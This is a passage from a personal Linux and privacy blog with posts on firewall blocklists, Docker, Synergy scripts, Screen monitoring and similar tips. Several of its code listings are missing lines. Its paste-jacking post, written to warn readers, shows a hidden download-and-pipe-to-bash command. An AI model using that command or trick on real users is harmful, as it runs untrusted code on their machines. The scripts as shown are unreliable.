    For this one, we’ll use Perl. We’ll look at our Apache log files to find people sniffing ‘round and we’ll block their traffic. Specifically, we’re going to check Apache’s ‘error.log’ for the phrases ‘File does not exist’ and ‘client denied by server configuration’ and block people causing those errors. This would be excessive for servers intended to serve the general populace. For a personal project, it works just fine as a ‘DO NOT DISTURB’ sign.

    #!/usr/bin/env perl
    use strict;
    use POSIX qw(strftime);

    my $log = ($ARGV[0] ? $ARGV[0] : "/var/log/apache2/error.log");
    my $chain = ($ARGV[1] ? $ARGV[1] : "bad_traffic");

    my @bad = `grep -iE 'File does not exist|client denied by server configuration' $log |cut -f8 -d" " | sed 's/]//' | sort -u`;
    my @ablk = `/sbin/iptables -S $chain|grep DROP|awk '{print $4}'|cut -d"/" -f1`;

    foreach my $ip (@bad) {
    if (!grep $_ eq $ip, @ablk) {
    chomp $ip;
    `/sbin/iptables -A $chain -s $ip -j DROP`;
    print strftime("%b %d %T",localtime(time))." badht: blocked bad HTTP traffic from: $ip\n";

    That gives us some great, utterly unforgiving, blockage. Looking at the IP addresses attempting to pry, I noticed that most of them were on at least one of the popular block-lists.

    So let’s make use of some of those block-lists! I found a program intended to apply those lists locally but, of course, it didn’t work for me. Here’s a similar program; this one will use ipset for managing the block-list though only minor changes would be needed to use iptables as above:



    WIZ_LISTS="chinese nigerian russian lacnic exploited-servers"

    "http://danger.rulez.sk/projects/bruteforceblocker/blist.php" # BruteForceBlocker IP List
    "http://rules.emergingthreats.net/blockrules/compromised-ips.txt" # Emerging Threats - Compromised IPs
    "http://www.spamhaus.org/drop/drop.txt" # Spamhaus Don't Route Or Peer List (DROP)
    "http://www.spamhaus.org/drop/edrop.txt" # Spamhaus Don't Route Or Peer List (DROP) Extended
    "http://cinsscore.com/list/ci-badguys.txt" # C.I. Army Malicious IP List
    "http://www.openbl.org/lists/base.txt" # OpenBL.org 90 day List
    "http://www.autoshun.org/files/shunlist.csv" # Autoshun Shun List
    "http://lists.blocklist.de/lists/all.txt" # blocklist.de attackers

    for address in "${BLACKLISTS[@]}"
    echo -e "\nFetching $address\n"
    curl "$address" >> $IP_TMP

    for list in $WIZ_LISTS
    wget "http://www.wizcrafts.net/$list-iptables-blocklist.html" -O - >> $IP_TMP

    wget 'http://wget-mirrors.uceprotect.net/rbldnsd-all/dnsbl-3.uceprotect.net.gz' -O - | gunzip | tee -a $IP_TMP

    grep -o '^[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}[/][0-9]\{1,3\}' $IP_TMP | tee -a $IP_BLACKLIST_TMP
    grep -o '^[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}[^/]' $IP_TMP | tee -a $IP_BLACKLIST_TMP

    sed -i 's/\t//g' $IP_BLACKLIST_TMP

    rm $IP_TMP

    wc -l $IP_BLACKLIST

    if hash ipset 2>/dev/null
    ipset flush bloxlist
    while IFS= read -r ip
    ipset add bloxlist $ip
    done < $IP_BLACKLIST
    echo -e '\nipset not found\n'
    echo -e "\nYour bloxlist file is: $IP_BLACKLIST\n"

    Download here:

    Tags: , , , , , , , , , ,
    Permalink: 20140713.simple.protection.with.iptables.ipset.and.blacklilsts

    Tue, 18 Mar 2014

    Random datums with Random.org

    I was reading about the vulnerability in the ‘random’ number generator in iOS 7 (http://threatpost.com/weak-random-number-generator-threatens-ios-7-kernel-exploit-mitigations/104757) and thought I would share a method that I’ve used. Though, I certainly was not on any version of iOS but, at least, I can help in GNU/Linux and BSDs.

    What if we want to get some random numbers or strings? We need a salt or something and, in the interest of best practices, we’re trying to restrain the trust given to any single participant in the chain. That is, we do not want to generate the random data from the server that we are on. Let’s make it somewhere else!

    YEAH! I know, right? Where to get a random data can be a headache-inducing challenge. Alas! The noble people at Random.org are using atmospheric noise to provide randomness for us regular folk!

    Let’s head over and ask for some randomness:

    Great! Still feels a little plain. What if big brother saw the string coming over and knew what I was doing? I mean, aside from the fact that I could easily wrap the string with other data of my choosing.

    Random.org is really generous with the random data, so why don’t we take advantage of that? Instead of asking for a single string, let’s ask for several. Nobunny will know which one I picked, except for me!

    We’ll do that by increasing the 'num' part of the request that we’re sending:

    They were also thinking of CLI geeks like us with the 'format' variable. We set that to 'plain' and all the fancy formatting for human eyes is dropped and we get a simple list that we don’t need to use any clever tricks to parse!
    curl -s 'https://www.random.org/strings/?num=25&len=16&digits=on&loweralpha=on&unique=on&format=plain&rnd=new'

    Now we’ve got 25 strings at the CLI. We can pick one to copy and paste. But what if we don’t want to do the picking? Well, we can use the local system to do that. We’ll have it pick a number between 1 and 25. It’s zero-indexed, so we’re going to increment by 1 so that our number is really between 1 and 25.
    echo $(( (RANDOM % 25)+1 ))

    Next, we’ll send our list to head with our random number. Head is going to give us the first X lines of what we send to it. So if our random number is 17, then it will give us the first 17 lines from Random.org
    curl -s 'https://www.random.org/strings/?num=25&len=16&digits=on&loweralpha=on&unique=on&format=plain&rnd=new' | head -$(( (RANDOM % 25)+1 ))

    After that, we’ll use the friend of head: tail. We’ll tell tail that we want only the last record of the list, of psuedo-random length, of strings that are random.
    curl -s 'https://www.random.org/strings/?num=25&len=16&digits=on&loweralpha=on&unique=on&format=plain&rnd=new' | head -$(( (RANDOM % 25)+1 )) | tail -1

    And we can walk away feeling pretty good about having gotten some properly random data for our needs!

    Tags: ,
    Permalink: 20140318.random.data

    Mon, 17 Feb 2014

    Installing INN’s Project Largo in a Docker containter

    Prereqruisites: Docker, Git, SSHFS.

    Today we’re going to look at using Docker to create a WordPress installation with the Project Largo parent theme and a child theme stub for us to play with.

    Hart Hoover has established an image for getting a WordPress installation up and running using Docker. For whatever reason, it didn’t work for me out-of-box but we’re going to use his work to get started.

    Let’s make a place to work and move into that directory:
    cd ~
    mkdir project.largo.wordpress.docker
    cd project.largo.wordpress.docker

    We’ll clone the Docker/Wordpress project. For me, it couldn’t untar the latest WordPress. So we’ll download it outside the container, untar it and modify the Dockerfile to simply pull in a copy:
    git clone https://github.com/hhoover/docker-wordpress.git
    cd docker-wordpress/
    wget http://wordpress.org/latest.tar.gz
    tar xvf latest.tar.gz
    sed -i 's/ADD http:\/\/wordpress.org\/latest.tar.gz \/wordpress.tar.gz/ADD \.\/wordpress \/wordpress/' Dockerfile
    sed -i '/RUN tar xvzf \/wordpress\.tar\.gz/d' Dockerfile

    Then, build the project which may take some time.
    sudo docker build -t $ME/wordpress .

    If you’ve not the images ready for Docker, the process should begin with something like:
    Step 0 : FROM boxcar/raring
    Pulling repository boxcar/raring
    32737f8072d0: Downloading [> ] 2.228 MB/149.7 MB 12m29s

    And end something like:
    Step 20 : CMD ["/bin/bash", "/start.sh"]
    ---> Running in db53e215e2fc
    ---> 3f3f6489c700
    Successfully built 3f3f6489c700

    Once the project is built, we will start it and forward ports from the container to the host system, so that the Docker container’s site can be accessed through port 8000 of the host system. So, if you want to see it from the computer that you’ve installed it on, you could go to ‘HTTP://’. Alternatively, if your host system is already running a webserver, we could use SSHFS to mount the container’s files within the web-space of the host system.

    In this example, however, we’ll just forward the ports and mount the project locally (using SSHFS) so we can easily edit the files perhaps using a graphical IDE such as NetBeans or Eclipse.

    Okay, time to start our Docker image and find its IP address (so we can mount its files):
    DID=$(docker run -p 8000:80 -d $ME/wordpress)
    DIP=$(docker inspect $DID | grep IPAddress | cut -d '"' -f 4)
    docker logs $DID| grep 'ssh user password:' --color

    Copy the SSH password and we will make a local directory to access the WordPress installation of our containter.
    cd ~
    mkdir largo.mount.from.docker.container
    sshfs user@$DIP:/var/www $HOME/largo.mount.from.docker.container
    cd largo.mount.from.docker.container
    PROJECT=$(pwd -P)

    Now, we can visit the WordPress installation and finish setting up. From the host machine, it should be ‘HTTP://’. There you can configure Title, Username, Password, et cet. and finish installing WordPress.

    Now, let’s get us some Largo! Since this is a test project, we’ll sacrifice security to make things easy. Our Docker WordPress site isn’t ready for us to easily install the Largo parent theme, so we’ll make the web directory writable by everybody. Generally, this is not a practice I would condone. It’s okay while we’re experimenting but permissions are very important on live systems!

    Lastly, we’ll download and install Largo and the Largo child theme stub.
    ssh user@$DIP 'sudo chmod -R 777 /var/www'
    wget https://github.com/INN/Largo/archive/master.zip -O $PROJECT/wp-content/themes/largo.zip
    unzip $PROJECT/wp-content/themes/largo.zip -d $PROJECT/wp-content/themes/
    mv $PROJECT/wp-content/themes/Largo-master $PROJECT/wp-content/themes/largo
    wget http://largoproject.wpengine.netdna-cdn.com/wp-content/uploads/2012/08/largo-child.zip -O $PROJECT/wp-content/themes/largo-child.zip
    unzip $PROJECT/wp-content/themes/largo-child.zip -d $PROJECT/wp-content/themes
    rm -rf $PROJECT/wp-content/themes/__MACOSX/

    We are now ready to customize our Project Largo child theme!

    Tags: , , , , , ,
    Permalink: 20140217.project.largo.docker

    Sat, 25 Jan 2014

    Network-aware Synergy client

    My primary machines are *nix or BSD variants, though I certainly have some Windows-based rigs also. Today we’re going to share some love with Windows 7 and PowerShell.

    One of my favorite utilities is Synergy. If you’re not already familiar it allows to you seamlessly move from the desktop of one computer to another with the same keyboard and mouse. It even supports the clipboard so you might copy text from a GNU/Linux box and paste it in a Windows’ window. Possibly, they have finished adding drag and drop to the newer versions. I am not sure because I run a relatively old version that is supported by all of the machines that I use regularly.

    What’s the problem, then? The problem was that I was starting my Synergy client by hand. Even more disturbing, I was manually typing the IP address at work and at home, twice or more per weekday. This behavior became automated by my brain and continued for months unnoticed. But this is no kind of life for a geek such as myself, what with all this superfluous clicking and tapping!

    Today, we set things right!

    In my situation, the networks that I use happen to assign IP addresses from different subnets. If you’ve not the convenience of that situation then you might need to add something to the script. Parsing an ipconfig/ifconfig command, you could possibly use something like the Default Gateway or the Connection-specific DNS Suffix. Alternatively, you could check for the presence of some network share, a file on server or anything that would allow you to uniquely identify the surroundings.

    As I imagined it, I wanted the script to accomplish the following things

    • see if Synergy is running (possibly from the last location), if so ask if we need to kill it and restart so we can identify a new server
    • attempt to locate where we are and connect to the correct Synergy server
    • if the location is not identified, ask whether to start the Synergy client

    This is how I accomplished that task:

    # [void] simply supresses the noise made loading 'System.Reflection.Assembly'
    [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")

    # Define Synergy server IP addresses
    $synergyServerWork = ""
    $synergyServerHome = ""

    # Define partial IP addresses that will indicate which server to use
    $synergyWorkSubnets = "192.168.111", "192.168.115"
    $synergyHomeSubnets = "192.168.222", "192.168.225"

    # Path to Synergy Client (synergyc)
    $synergyClientProgram = "C:\Program Files\Synergy\synergyc.exe"

    # Path to Syngery launcher, for when we cannot identify the network
    $synergyLauncherProgram = "C:\Program Files\Synergy\launcher.exe"

    # Remove path and file extension to give us the process name
    $processName = $synergyClientProgram.Substring( ($synergyClientProgram.lastindexof("\") + 1), ($synergyClientProgram.length - ($synergyClientProgram.lastindexof("\") + 5) ))

    # Grab current IP address
    $currentIPaddress = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]

    # Find the subnet of current IP address
    $location = $currentIPaddress.Substring(0,$currentIPaddress.lastindexof("."))

    function BalloonTip ($message)
    # Pop-up message from System Tray
    $objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
    $objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($synergyClientProgram)
    $objNotifyIcon.BalloonTipText = $message
    $objNotifyIcon.Visible = $True


    # If Synergy client is already running, do we need to restart it?
    $running = Get-Process $processName -ErrorAction SilentlyContinue
    if ($running) {
    $answer = [System.Windows.Forms.MessageBox]::Show("Synergy is running.`nClose and start again?", "OHNOES", 4)
    if ($answer -eq "YES") {
    Stop-Process -name $processName
    Else {

    # Do we recognize the current network?
    if ($synergyWorkSubnets -contains $location) {
    BalloonTip "IP: $($currentIPaddress)`nServer: $($synergyServerWork)`nConnecting to Synergy server at work."
    & $synergyClientProgram $synergyServerWork
    ElseIf ($synergyHomeSubnets -contains $location) {
    BalloonTip "IP: $($currentIPaddress)`nServer: $($synergyServerHome)`nConnecting to Synergy server at home."
    & $synergyClientProgram $synergyServerHome
    Else {
    $answer = [System.Windows.Forms.MessageBox]::Show("Network not recognized by IP address: {0}`n`nLaunch Synergy?" -f $unrecognized, "OHNOES", 4)
    if ($answer -eq "YES") {
    & $synergyLauncherProgram

    Then I saved the script in "C:\Program Files\SynergyStart\", created a shortcut and used the Change Icon button to make the same as Synergy’s and made the Target:
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden & 'C:\Program Files\SynergyStart\synergy.ps1'

    Lastly, I copied the shortcut into the directory of things that run when the system starts up:
    %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

    Now, Synergy connects to the needed server at home and work. If it can’t figure out where it is, it asks if it should run it at all.

    As they say, a millisecond saved is a millisecond earned.

    This post was very nearly published without a Linux equivalent. Nearly.

    Same trick for bash/zsh: #!/bin/zsh

    # Define Synergy server IP addresses

    # Define partial IP addresses that will indicate which server to use
    synergyWorkSubnets=("192.168.111" "192.168.115")
    synergyHomeSubnets=("192.168.222" "192.168.225")

    # Path to Synergy Client (synergyc)

    # Path to QuickSyngery, for when we cannot identify the network

    # Remove path and file extension to give us the process name
    processName=`basename $synergyClientProgram`

    # Grab current IP address, assumes '192' is in use. (e.g.,
    currentIPaddress=`ip addr show | grep 192 | awk "{print $2}" | sed 's/inet //;s/\/.*//;s/ //g'`

    # Find the subnet of current IP address
    location=`echo $currentIPaddress | cut -d '.' -f 1,2,3`

    for i in "${synergyWorkSubnets[@]}"
    if [ "${i}" = "${location}" ]


    # If Synergy client is already running, do we need to restart it?
    running=`ps ax | grep -v grep | grep $processName`
    if [ $running ]
    if `zenity --question --ok-label="Yes" --cancel-label="No" --text="Synergy is running.\nClose and start again?"`
    pkill $processName

    # Do we recognize the current network?
    for i in "${synergyWorkSubnets[@]}"
    if [ "${i}" = "${location}" ]
    notify-send "IP:$currentIPaddress Server:$synergyServerWork [WORK]"
    $synergyClientProgram $synergyServerWork

    for i in "${synergyHomeSubnets[@]}"
    if [ "${i}" = "${location}" ]
    notify-send "IP:$currentIPaddress Server:$synergyServerWork [HOME]"
    $synergyClientProgram $synergyServerHome

    if `zenity --question --ok-label="Yes" --cancel-label="No" --text="Network not recognized by IP address: $currentIPaddress\nLaunch Synergy?"`

    To get it to run automatically, you might choose to call the script from /etc/init.d/rc.local.

    Download here:

    Tags: , ,
    Permalink: 20140125.network_aware_synergy_client

    Thu, 04 Jul 2013

    Preventing paste-jacking with fc

    Paste-jacking: what? It’s a somewhat tongue-in-cheek name representing that, when it comes to the web, what you see is not necessarily what you copy.

    Content can be hidden inside of what you’re copying. For example: ls /dev/null; echo " Something nasty could live here! 0_o ";

    Paste below to see what lurks in the <span> that you’re not seeing:

    If pasted to the command line, this could cause problems. It might seem trivial but it isn’t if you give it some thought. If I had compiled a command that could be considered a single line, but a very long line then commands could easily be slipped in and it might not jump out at you. Given the right kind of post, it could even involve a sudo and one might give very little thought to typing in a password, handing all power over. It even could be something like: wget -q "nasty-shell-code-named-something-harmless-sounding" -O-|bash

    Then it would, of course, continue with innocuous commands that might do something that takes your attention and fills your screen with things that look comforting and familiar, like an apt-get update followed by an upgrade.

    In this way, an unsuspecting end-user could easily install a root-kit on behalf of Evil Genius™.

    So what’s the cure?

    Some suggest that you never copy and paste from web pages. That’s solid advice. You’ll learn more by re-typing and nothing is going to be hidden. The downside is it isn’t entirely practical. It’s bound to be one of those things that, in certain circumstances, we know that we ought do but don’t have time or patience for, every single time.

    To the rescue comes our old friend fc! Designed for letting you build commands in a visual editor, it is perfect for this application. Just type fc at the command line and then paste from the web page into your text editor of choice. When you’re satisfied with the command, exit the editor. The line will be executed and there won’t be a shred of doubt about what, precisely, is being executed.

    This isn’t really the intended use of fc, so it’s a makeshift solution. fc opens with the last command already on screen. So, you do have to delete that before building your new command but it’s an insignificant inconvenience in exchange for the ability to know what’s going to run before it has a chance to execute.

    Read more at ush.it and h-online.com.

    Tags: , , ,
    Permalink: 20130704.prevent.paste-jacking.with.fc

    Wed, 26 Jun 2013

    Terminal suddenly Chinese

    The other day, I was updating one of my systems and I noticed that it had decided to communicate with me in Chinese. Since I don’t know a lick of Chinese, it made for a clumsy exchange.

    It was Linux Mint (an Ubuntu variant), so a snip of the output from an ‘apt-get upgrade’ looked like this: terminal screen with Chinese characters

    I’m pretty sure I caused it — but there’s no telling what I was working on and how it slipped past me. Anyway, it’s not a difficult problem to fix but I imagine it could look like big trouble.

    So, here’s what I did:
    > locale

    The important part of the output was this:

    If you want to set your system to use a specific editor, you can set $EDITOR=vi and then you’re going to learn that some programs expect the configuration to be set in $VISUAL and you’ll need to change it there too.

    In a similar way, many things were using the en_US.UTF-8 set in LANG, but other things were looking to LANGUAGE and determining that I wanted Chinese.

    Having identified the problem, the fix was simple. Firstly, I just changed it in my local environment:
    > LANGUAGE=en_US.UTF-8

    That solved the immediate problem but, sooner or later, I’m going to reboot the machine and the Chinese setting would have come back. I needed to record the change somewhere for the system to know about it in the future.

    > vim /etc/default/locale

    Therein was the more permanent record, so I changed LANGUAGE there also, giving the result:


    And now, the computer is back to using characters that I (more-or-less) understand.

    Tags: , , , , ,
    Permalink: 20130626.terminal.suddenly.chinese

    Thu, 13 Jun 2013

    Blogitechture continued… Simplify with Vim

    Last we were discussing the structure and design of your own CLI-centric blog platform, we had some crude methods of starting and resuming posts before publishing.

    Today, let’s explore a little more into setting up a bloging-friendly environment because we need to either make the experience of blogging easy or we’ll grow tired of the hassle and lose interest.

    We can reasonably anticipate that we won’t want to beleaguered with repetitious typing of HTML bits. If we’re going to apply paragraph tags, hyperlinks, codeblocks, etc. with any frequency, that task is best to be simplified. Using Vim as our preferred editor, we will use Tim Pope’s brilliant plug-ins ‘surround’ and ‘repeat’, combined with abbreviations to take away the tedium.

    The plug-ins just need dropped into your Vim plugin directory (~/.vim/plugin/). The directory may not exist if you don’t have any plug-ins yet. That’s no problem, though. Let’s grab the plugins:

    cd ~/.vim/
    wget "http://www.vim.org/scripts/download_script.php?src_id=19287" -O surround.zip
    wget "http://www.vim.org/scripts/download_script.php?src_id=19285" -O repeat.zip

    Expand the archives into the appropriate directories:

    unzip surround.zip
    unzip repeat.zip

    Ta-da! Your Vim is now configured to quickly wrap (surround) in any variety of markup. When working on a blog, you might use <p> tags a lot by putting your cursor amid the paragraph and typing yss<p>. The plug-in will wrap it with opening and closing paragraph tags. Move to your next paragraph and then press . to repeat.

    That out of the way, let’s take advantage of Vim’s abbreviations for some customization. In our .vimrc file, we can define a few characters that Vim will expand according to their definition. For example, you might use:
    ab <gclb> <code class="prettyprint lang-bsh linenums:1">
    Then, any time you type <gclb> and bress <enter>, you’ll get:
    <code class="prettyprint lang-bsh linenums:1">

    The next time that we take a look at blogitecture, we will focus on making the posts convenient to manage from our CLI.

    Tags: , , , ,
    Permalink: 20130613.blogitechture.continued

    Sun, 09 Jun 2013

    ixquick link maker

    In an effort to promote practical privacy measures, when I send people links to search engines, I choose ixquick. However, my personal settings submit my search terms via POST data rather than GET, meaning that the search terms aren’t in the URL.

    Recently, I’ve found myself hand-crafting links for people and then I paste the link into a new tab, to make sure I didn’t fat-finger anything. Not a problem per se, but the technique leaves room for a bit more efficiency. So I’ve taken the ‘A Search Box on Your Website’ tool offered by ixquick and slightly modified the code it offers, to use GET variables, in a new tab where I can then copy the URL and provide the link to others.

    You can test, or use, it here — I may add it (or a variant that just provides you the link) to the navigation bar above. First, though, I’m going to mention the need to the outstanding minds at ixquick because it would make a LOT more sense on their page than on mine.

    Tags: ,
    Permalink: 20130609.ixquick.search

    Thu, 06 Jun 2013

    Managing to use man pages through simple CLI tips

    Recently, an author I admire and time-honored spinner of the Interwebs, Tony Lawrence emphasized the value of using man pagesmanual pagesDocumentation available from the command line.
    > man ls
    as a sanity check before getting carried away with powerful commands. I didn’t know about this one but he has written about a situation in which killall could produce some shocking, and potentially quite unpleasant, results.

    Personally, I often quickly check man pages to be certain that I am using the correct flags or, as in the above case, anticipating results that bear some resemblance to what is actually likely to happen. Yet, it seems many people flock toward SERPSearch Engine Results Page A tasteful replacement for mentioning any particular search-engine by name.
    Also useful as a verb:
    I dunno. You’ll have to SERP it.
    s for this information.

    Perhaps the most compelling reason to head for the web is leaving the cursor amid the line you’re working on, without disturbing the command. SERPing the command however, could easily lead you to information about a variant that is more common than the one available to you. More importantly, the information retrieved from the search engine is almost certainly written by someone who did read the man page — and may even come with the admonishment that you RTFMRead The F#!$!*#’n Manual as a testament to the importance of developing this habit.

    This can be made easier with just a few CLI shortcuts.

    <CTRL+u> to cut what you have typed so far and <CTRL+y> to paste it back.

    That is, you press <CTRL+u> and the line will be cleared, so you can then type man {command} and read the documentation. Don’t hesitate to jot quick notes of which flags you intend to use, if needed. Then exit the man page, press <CTRL+y> and finish typing right where you left off.

    This is another good use for screen or tmux but let’s face it. There are times when you don’t want the overhead of opening another window for a quick look-up and even instances when these tools aren’t available.

    A few other tips to make life easier when building complex commands:

    Use the command fc to open up an editor in which you can build your complex command and, optionally, even save it as a shell script for future reuse.

    Repeat the last word from the previous command (often a filename) with <ALT+.> or use an item from the last command by position, in reverse order:
    > ls -lahtr *archive*
    <ALT+1+.> : *archive*
    <ALT+2+.> : -lahtr
    <ALT+3+.> : ls

    You can also use Word Designators to use items from history, such as adding sudo to the last command typed by:
    sudo !!

    This allows for tricks like replacing bits of a previous command:

    Lastly, if you need a command that was typed earlier, you can search history by pressing <CTRL+r> and start typing an identifying portion of the command.

    (Note: I have used these in Zsh and Bash, specifically. They can, however, be missing or overwritten — if a feature you want isn’t working, you can bind keys in a configuration file. Don’t just write it off, once you’ve solved the problem it will never again be an intimidating one.)

    Happy hacking!

    Tags: , , , , , , , ,
    Permalink: 20130606.managing.to.use.man.pages

    Tue, 04 Jun 2013

    Painless protection with Yubico’s Yubikey

    Recently, I ordered a Yubikey and, in the comments section of the order, I promised to write about the product. At the time, I assumed that there was going to be something about which to write: (at least a few) steps of setting up and configuration or a registration process. They’ve made the task of writing about it difficult, by making the process of using it so easy.

    Plug it in. The light turns solid green and you push the button when you need to enter the key. That’s the whole thing!

    Physically, the device has a hole for a keychain or it can slip easily into your wallet. It draws power from the USB port on the computer, so there’s none stored in the device, meaning it should be completely unfazed if you accidentally get it wet.

    Let’s take a look at the device.

    > lsusb | grep Yubico

    Bus 005 Device 004: ID 1050:0010 Yubico.com Yubikey

    We see that it is on Bus 5, Device 4. How about a closer look?

    > lsusb -v -s5:4

    Bus 005 Device 004: ID 1050:0010 Yubico.com Yubikey
    Couldn't open device, some information will be missing
    Device Descriptor:
      bLength                18
      bDescriptorType         1
      bcdUSB               2.00
      bDeviceClass            0 (Defined at Interface level)
      bDeviceSubClass         0 
      bDeviceProtocol         0 
      bMaxPacketSize0         8
      idVendor           0x1050 Yubico.com
      idProduct          0x0010 Yubikey
      bcdDevice            2.41
      iManufacturer           1 
      iProduct                2 
      iSerial                 0 
      bNumConfigurations      1
      Configuration Descriptor:
        bLength                 9
        bDescriptorType         2
        wTotalLength           34
        bNumInterfaces          1
        bConfigurationValue     1
        iConfiguration          0 
        bmAttributes         0x80
          (Bus Powered)
        MaxPower               30mA
        Interface Descriptor:
          bLength                 9
          bDescriptorType         4
          bInterfaceNumber        0
          bAlternateSetting       0
          bNumEndpoints           1
          bInterfaceClass         3 Human Interface Device
          bInterfaceSubClass      1 Boot Interface Subclass
          bInterfaceProtocol      1 Keyboard
          iInterface              0 
            HID Device Descriptor:
              bLength                 9
              bDescriptorType        33
              bcdHID               1.11
              bCountryCode            0 Not supported
              bNumDescriptors         1
              bDescriptorType        34 Report
              wDescriptorLength      71
             Report Descriptors: 
               ** UNAVAILABLE **
          Endpoint Descriptor:
            bLength                 7
            bDescriptorType         5
            bEndpointAddress     0x81  EP 1 IN
            bmAttributes            3
              Transfer Type            Interrupt
              Synch Type               None
              Usage Type               Data
            wMaxPacketSize     0x0008  1x 8 bytes
            bInterval              10

    There’s not a great deal to be seen here. As it tells you right on Yubico’s site, the device presents as a keyboard and it “types” out its key when you press the button, adding another long and complex password to combine with the long and complex password that you’re already using.

    Keep in mind that this device is unable to protect you from keyloggers, some of which are hardware-based. It’s critically important that you are very, very careful about where you’re sticking your Yubikey. Even Yubico cannot protect us from ourselves.

    Tags: , , , ,
    Permalink: 20130604.yay.yubico.yubikey

    Thu, 30 May 2013

    Making ixquick your default search engine

    In this writer’s opinion, it is vitally important that we take reasonable measures now to help insure anonymity, lest we create a situation where privacy no longer exists, and the simple want of, becomes suspicious.

    Here’s how to configure your browser to automatically use a search engine that respects your privacy.


    1. Click Settings.
    2. Click “Set pages” in the “On startup” section.
    3. Enter https://ixquick.com/eng/ in the “Add a new page” text field.
    4. Click OK.
    5. Click “Manage search engines…”
    6. At the bottom of the “Search Engines” dialog, click in the “Add a new search engine” field.
    7. Enter
    8. Click “Make Default”.
    9. Click “Done”.


    1. Click the Tools Menu.
    2. Click Options.
    3. Click the General tab.
    4. In “When Firefox Starts” dropdown, select “Show my home page”.
    5. Enter https://ixquick.com/eng/ in the “Home Page” text field.
    6. Click one of the English options here.
    7. Check box for “Start using it right away.”
    8. Click “Add”.


    1. Click “Manage Search Engines
    2. Click “Add”
    3. Enter
      Name: ixquick
      Keyword: x
      Address: https://ixquick.com/do/search?lui=english&language=english&cat=web&query=%s
    4. Check “Use as default search engine”
    5. Click “OK”

    Internet Explorer:

        _     ___  _ __        ___   _ _____ ___ 
       | |   / _ \| |\ \      / / | | |_   _|__ \
       | |  | | | | | \ \ /\ / /| | | | | |   / /
       | |__| |_| | |__\ V  V / | |_| | | |  |_| 
       |_____\___/|_____\_/\_/   \___/  |_|  (_) 
      (This is not a good strategy for privacy.)



    You are now one step closer to not having every motion on the Internet recorded.

    This is a relatively small measure, though. You can improve your resistance to prying eyes (e.g., browser fingerprinting) by using the Torbrowser Bundle, or even better, Tails, and routing your web usage through Tor, i2p, or FreeNet.

    If you would like more on subjects like anonymyzing, privacy and security then drop me a line via email or Bitmessage me: BM-2D9tDkYEJSTnEkGDKf7xYA5rUj2ihETxVR

    Tags: , , , , , , , , , , , , , ,
    Permalink: 20130530.hey.you.get.offa.my.data

    Thu, 23 May 2013

    GNU Screen: Roll your own system monitor

    Working on remote servers, some tools are practically ubiquitous — while others are harder to come by. Even if you’ve the authority to install your preferred tools on every server you visit, it’s not always something you want to do. If you’ve hopped on to a friend’s server just to troubleshoot a problem, there is little reason to install tools that your friend is not in the habit of using. Some servers, for security reasons, are very tightly locked down to include only a core set of tools, to complicate the job of any prying intruders. Or perhaps it is a machine that you normally use through a graphical interface but on this occasion you need to work from the CLI.

    These are very compelling reasons to get comfortable, at the very least, with tools like Vim, mail, grep and sed. Eventually, you’re likely to encounter a situation where only the classic tools are available. If you aren’t competent with those tools, you’ll end up facing the obstacle of how to get files from the server to your local environment where you can work and, subsequently, how to get the files back when you’re done. In a secured environment, this may not be possible without violating protocols.

    Let’s take a look at how we can build a makeshift system monitor using some common tools. This particular configuration is for a server running PHP, MySQL and has the tools Htop and mytop installed. These can easily be replaced with top and a small script to SHOW FULL PROCESSLIST, if needed. The point here is illustrative, to provide a template to be modified according to each specific environment.

    (Note: I generally prefer tmux to Gnu Screen but screen is the tool more likely to be already installed, so we’ll use it for this example.)

    We’re going to make a set of windows, by a configuration file, to help us keep tabs on what is happening in this system. In so doing, we’ll be using the well-known tools less and watch. More specifically, less +F which tells less to “scroll forward”. Other words, less will continue to read the file making sure any new lines are added to the display. You can exit this mode with CTRL+c, search the file (/), quit(q) or get back into scroll-forward mode with another uppercase F.

    Using watch, we’ll include the “-d” flag which tells watch we want to highlight any changes (differences).

    We will create a configuration file for screen by typing:

    > vim monitor.screenrc

    In the file, paste the following:

    # Screen setup for system monitoring
    # screen -c monitor.screenrc
    hardstatus alwayslastline
    hardstatus string '%{= kG}[ %{G}%H %{g}][%= %{=kw}%?%-Lw%?%{r}(%{W}%n*%f%t%?(%u)%?%{r})%{w}%?%+Lw%?%?%= %{g}][%{B}%Y-%m-%d %{W}%c %{g}]'

    screen -t htop 0 htop
    screen -t mem 1 watch -d "free -t -m"
    screen -t mpstat 2 watch -d "mpstat -A"
    screen -t iostat 3 watch -d "iostat"
    screen -t w 4 watch -d "w"
    screen -t messages 5 less +F /var/log/messages
    screen -t warn 6 less +F /var/log/warn
    screen -t database 7 less +F /srv/www/log/db_error
    screen -t mytop 8 mytop
    screen -t php 9 less +F /srv/www/log/php_error

    (Note: -t sets the title, then the window number, followed by the command running in that window)

    Save the file (:wq) or, if you’d prefer, you can grab a copy by right-clicking and saving this file.

    Then we will execute screen using this configuration, as noted in the comment:

    > screen -c monitor.screenrc

    Then you can switch between windows using CTRL+a, n (next) or CTRL+a, p (previous).

    I use this technique on my own computers, running in a TTY different from the one used by X. If the graphical interface should get flaky, I can simply switch to that TTY (e.g., CTRL+ALT+F5) to see what things are going on — and take corrective actions, if needed.

    Tags: , , , , , , , , , ,
    Permalink: 20130523.gnu.screen.system.monitor

    Mon, 20 May 2013

    Debugging PHP with Xdebug

    I have finished (more-or-less) making a demo for the Xdebug togglin’ add-on/extension that I’ve developed.

    One hundred percent of the feedback about this project has been from Chrome users. Therefore, the Chrome extension has advanced with the new features (v2.0), allowing selective en/dis-ableing portions of Xdebug’s output. That is you can set Xdebug to firehose mode (spitting out everything) and then squelch anything not immediately needed at the browser layer. The other information remains present, hidden in the background, available if you decide that you need to have a look.

    The Firefox version is still at v1.2 but will be brought up to speed as time permits.

    If you want that firehose mode for Xdebug, here’s a sample of some settings for your configuration ‘.ini’ file.

    The demo is here.

    Tags: , , , , , , ,
    Permalink: 20130520.debugging.php.with.xdebug

    Wed, 15 May 2013

    Git: an untracked mess?

